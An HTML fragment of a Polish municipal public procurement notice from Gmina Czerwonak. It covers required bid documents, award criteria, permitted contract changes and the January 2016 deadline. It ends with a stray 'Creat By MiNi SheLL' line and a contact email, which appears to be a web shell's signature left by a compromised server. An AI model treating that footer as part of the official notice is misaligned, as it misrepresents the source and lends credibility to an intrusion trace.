<p>Ponadto obok dokumentów potwierdzających spełnienie warunków udziału w postępowaniu Wykonawca składa:
1)	ofertę, wg wzoru oferty, stanowiącego część II SIWZ,
2)	listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Pzp albo informację o tym, że Wykonawca nie należy do grupy kapitałowej, stanowiącą załącznik nr 3 do formularza oferty,
3)	dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, a podpisywana jest przez Pełnomocnika,
4)	stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji (maksymalny okres gwarancji wynosi 60 miesięcy, natomiast minimalny (najkrótszy) 36 miesięcy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich wprowadzenia:
1)	zmiany podmiotu, o którym mowa w art. 26 ust. 2b Pzp, na inny pod warunkiem udowodnienia Zamawiającemu, że nowy podmiot spełnia warunki udziału określone w niniejszym postępowaniu;
2)	zmiany terminu realizacji - w przypadku wystąpienia:
a)	robót dodatkowych koniecznych do wykonania podstawowego zakresu zadania;
b)	konieczności wprowadzenia zmian w dokumentacji projektowej;
c)	wystąpienie okoliczności o których mowa w pkt 3 oraz pkt 6 lit. c. niniejszego paragrafu;
fakt ten zostanie potwierdzony wpisem do dziennika budowy;
3)	zmiany w zakresie ilości wykonanych robót, technologii wykonania lub inne zmiany dokumentacji projektowej, jeżeli są konieczne dla dalszej realizacji zamówienia lub są korzystne dla Zamawiającego;
4)	zmian osobowych - zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane lub innych ustawach, w szczególności kierownika budowy;
5)	zmiany umowy w związku z przekształceniem firmy lub wynikające z następstwa prawnego, zgodnie z obowiązującymi przepisami;
6)	dopuszcza się zmianę wynagrodzenia Wykonawcy wynikającego ze złożonej oferty w przypadku:
a)	zmiany stawki podatku od towarów i usług;
b)	obniżenia wynagrodzenia, gdy zmiana zostanie spowodowana zmniejszeniem zakresu wykonanych robót i jest korzystna dla Zamawiającego;
c)	rezygnacji przez Zamawiającego z wykonania części robót budowlanych związanych z wykonaniem przedmiotu zamówienia.
Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
1)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana numeru rachunku bankowego);
2)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czerwonak.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czerwonak Biuro Zamówień Publicznych i Pożytku Publicznego ul. Źródlana 39, 62-004 Czerwonak, pok. 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.01.2016 godzina 11:00, miejsce: Urząd Gminy Czerwonak ul. Źródlana 39, 62-004 Czerwonak, pok. 3 (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów. 2. Zamawiający nie zamierza zawierać umowy ramowej. 3. Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, zgodnie z formułą spełnia nie spełnia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com